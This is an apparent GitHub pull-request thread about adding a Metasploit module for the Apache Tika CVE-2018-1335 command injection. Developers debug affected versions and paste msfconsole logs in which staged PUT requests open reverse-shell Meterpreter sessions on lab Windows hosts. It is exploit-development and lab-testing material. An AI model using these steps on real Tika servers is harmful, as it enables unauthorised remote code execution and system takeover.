Apache Tika CVE-2018-1335 RCE

[h00die]

Fixes #11556

This module exploits an RCE in Apache Tika v 1.7-1.17.
Its Extremely simple, I simply ported the python module to ruby and the framework.

@DaveYesland if you wanted different attribution in this, let me know.

Install is easy, install java, download the sever jar java -jar <server.jar> -h <ip>.

Verification

• Start msfconsole
• use exploits/windows/http/apache_tika_jp2_jscript
• set rhost
• expoit
• Verify you get a shell
• Document looks good. It's VERY simplistic since @DaveYesland did an AWESOME write-up and everyone should just reference that.

[bcoles]

I believe @sgonzalez-r7 may have been looking into this, as per #11556

[wvu]

Yes, @sgonzalez-r7 was assigned and has been working on it. Oops.

[wvu]

No Twitter handles yet.

[h00die]

Shoot, I didn't look before leaping. Sorry @sgonzalez-r7

[sgonzalez-r7]

@h00die, I'm a bit bummed. It was gonna be my first Metasploit module. If you closed the PR on my account, please don't. It would be a waste of perfectly good code.

[sgonzalez-r7]

@h00die, I can even review/land it since I already have the target setup :)

[h00die]

It's NBD. Let's flip it. You make the module and docs, and since I have a test env I can land it! I'm pretty positive you'll come up with something much better and more reliable than what I put together anyways.
Plus, I got to learn powershell integration, so I already got a benefit from writing this.

[wvu]

Is this broken?

[h00die]

There are like 4 modules that have use_single_quote=true. It wasn't in the library, nor did it make a difference in the code. I did see an issue/pr that mentioned it being removed, forgot who did/wrote it though

[wvu]

You mean use_single_quotes?

[wvu]

rapid7/rex-powershell#7

[wvu]

You didn't remove this, @sempervictus?

https://github.com/rapid7/rex-powershell/search?q=use_single_quotes

[h00die]

yea, forgot the s on the end.
https://github.com/rapid7/metasploit-framework/search?q=use_single_quotes&unscoped_q=use_single_quotes
I saw it passed as a parameter, and in a hash. Tried both, printing to screen and didn't see a difference. Never thought to check rex-powershell since this is my first time working with PSH.
I saw #9132 (comment) and thought it had been removed

[wvu]

Gone in #8728. Try wrap_double_quotes. Might want to fix the regressions introduced.

[wvu]

I know this was written for Windows, but is there any reason a Unix system couldn't be targeted?

[h00die]

Not sure. it calls a .exe on windows and passes params to it. If the .exe equivalent on linux has the same parameters, there's a good chance the flags would match. All the documentation was for windows.
Devils in the details. I thought about getting this written first, then if time permitted (most likely wouldn't) going back to see if it works for additional OSes

[wvu]

Easily tested. I wanted someone to look into that. cc @sgonzalez-r7

[DaveYesland]

I know this was written for Windows, but is there any reason a Unix system couldn't be targeted?

I did a little testing on Unix when working on this and was only able to break out of the command on Windows. The command in the end looks like "injected.exe"originalcommand some args here. The way Windows interprets double quotes is what lets the injection happen. Does not mean it is not possible just what I found.

[wvu]

@sgonzalez-r7: I've reviewed this lightly. Do with it what you will for your PR. I suggest investigating Unix support.

[h00die]

@sgonzalez-r7 any word on when you'll tika stab at this?

[h00die]

@sgonzalez-r7 ping, just checking in since its been a month, didn't know if this made it to the priority list yet or not

[sgonzalez-r7]

@h00die , thanks for the ping. I'll be putting this at the to of my priority list this week.

I did try verifying your implementation on a Win 7 VM with no luck. Running check shows as vulnerable, but I'm not able to get a session. I'll keep you updated.

[h00die]

Any more updates @sgonzalez-r7 ? At this point i'm leaning towards re-opening this PR so there's at least something in the framework.

[sgonzalez-r7]

Go ahead and re-open your PR and run with it.

[jrobles-r7]

I PR-ed a few changes to your branch.

h00die#12

[h00die]

My weak guess on why this isn't working now is either some sort of sandboxing, or the env isn't supporting %TEMP% . I'll look in a few days to see if u can figure it out

[jrobles-r7]

I tested the changes on Win10 x64 v1703.

[h00die]

Haven't forgotten about this, just wanted to get the hashcat and brocade testing done first

[h00die]

Originally I thought it was a psh thing, I was starting java via PSH, and in that psh if I cd %TEMP% it didn't know what %TEMP% was. Obvi env issue.
However, I used cmd.exe and watched %TEMP% which was now loading, and i'm not seeing any files written at all. Definitely broken on server 2012.

Also tried on my win10 1709, same results. @jrobles-r7 can you re-try this and see if its working for you?

[jrobles-r7]

@h00die I tested the latest commit on Win10 1803. The module worked for me. I tested with tika launched from cmd.exe and psh. Both were successful.

msf5 exploit(windows/http/apache_tika_jp2_jscript) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Sending stage (179779 bytes) to 172.22.222.177
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.177:49794) at 2019-07-22 10:03:31 -0500

meterpreter > getuid
Server username: DESKTOP-BRHRDI2\msfdev
meterpreter > sysinfo
Computer        : DESKTOP-BRHRDI2
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

[h00die]

Windows 10 (running as admin from cmd) tika 1.14 java 1.80_211 no firewall, no AV:

root@dev:~/metasploit-framework# git checkout upstream/pr/11653
Note: checking out 'upstream/pr/11653'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at 0d1385d8d5 Merge pull request #12 from jrobles-r7/tika
root@dev:~/metasploit-framework# ./msfconsole 

       =[ metasploit v5.0.14-dev-0d1385d8d5               ]
+ -- --=[ 1870 exploits - 1060 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

[*] Starting persistent handler(s)...
msf5 > use exploit/windows/http/apache_tika_jp2_jscript 
msf5 exploit(windows/http/apache_tika_jp2_jscript) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 exploit(windows/http/apache_tika_jp2_jscript) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Exploit completed, but no session was created.

I tried a fresh checkout from the PR and still, nothing. Tried a messagebox payload, never popped. Checked the %TEMP folder, nothing is being written.

[h00die]

i see about taking a look more this weekend at the difference in the PUT requests to see if its something obvious, or what is going on here

[wchen-r7]

If you breakpoint on CreateProcess, does it hit at all? If it doesn't, there is something wrong on the Java level. If it does, there is something wrong on the OS level.

I also make that sound very obvious...

[h00die]

Some interesting things during testing.
I used 1.17, and the changes to the module worked.
When I tested the changes before, it was on 1.14 which is marked as vuln.
I also downloaded 1.9 which is marked vuln.

What I'm finding is that this module, and the POC work on 1.17, and 1.17 ONLY. I was unable to get the POC nor this module to work (out of the box) on <1.17 or 1.18 (which isn't vulnerable, so this is expected).
TBH, I don't wish to debug java to determine exactly what the changes are that are effecting this on pre 1.17 versions. The CVE shows <.17 is vuln, but I think at this point it may be worth just adjusting the version check and ONLY showing 1.17 as exploitable (as opposed to vulnerable)

[wchen-r7]

I think that sounds reasonable.

[DaveYesland]

Some interesting things during testing.
I used 1.17, and the changes to the module worked.
When I tested the changes before, it was on 1.14 which is marked as vuln.
I also downloaded 1.9 which is marked vuln.

What I'm finding is that this module, and the POC work on 1.17, and 1.17 ONLY. I was unable to get the POC nor this module to work (out of the box) on <1.17 or 1.18 (which isn't vulnerable, so this is expected).
TBH, I don't wish to debug java to determine exactly what the changes are that are effecting this on pre 1.17 versions. The CVE shows <.17 is vuln, but I think at this point it may be worth just adjusting the version check and ONLY showing 1.17 as exploitable (as opposed to vulnerable)

Was looking into this a bit and looks like you are correct I was able to get the POC to work on 1.16 and 1.17 but not 1.14.

I think the issue is 1.14 does not look like it had support for jp2 which the exploit relies on...

[h00die]

confirmed 16 and 15 are exploitable as well, so coverage is 15-17. Lucky guess on 14! Will update the module to accept all that and should be done in an hour or so!

[h00die]

@jrobles-r7 / @wchen-r7 should be ready to go!

[jrobles-r7]

msf5 exploit(windows/http/apache_tika_jp2_jscript) > check

[*] Apache Tika Version Detected: 1.17
[+] 172.22.222.231:9998 - The target is vulnerable.
msf5 exploit(windows/http/apache_tika_jp2_jscript) > set verbose false
verbose => false
msf5 exploit(windows/http/apache_tika_jp2_jscript) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Sending stage (179779 bytes) to 172.22.222.231
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.231:51086) at 2019-08-01 17:46:53 -0500

meterpreter > getuid
Server username: DESKTOP-BRHRDI2\msfdev
meterpreter > sysinfo
Computer        : DESKTOP-BRHRDI2
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

[jrobles-r7]

Release Notes

The apache_tika_jp2_jscript module has been added to the framework. It targets CVE-2018-1335 and exploits a command injection vulnerability in Apache Tika v1.15-v1.17 on Windows. The vulnerability occurs when OCR is specified in the request, which allows command line parameters to be passed to the host.

[jrobles-r7]

Thanks for the contribution and testing @h00die and @DaveYesland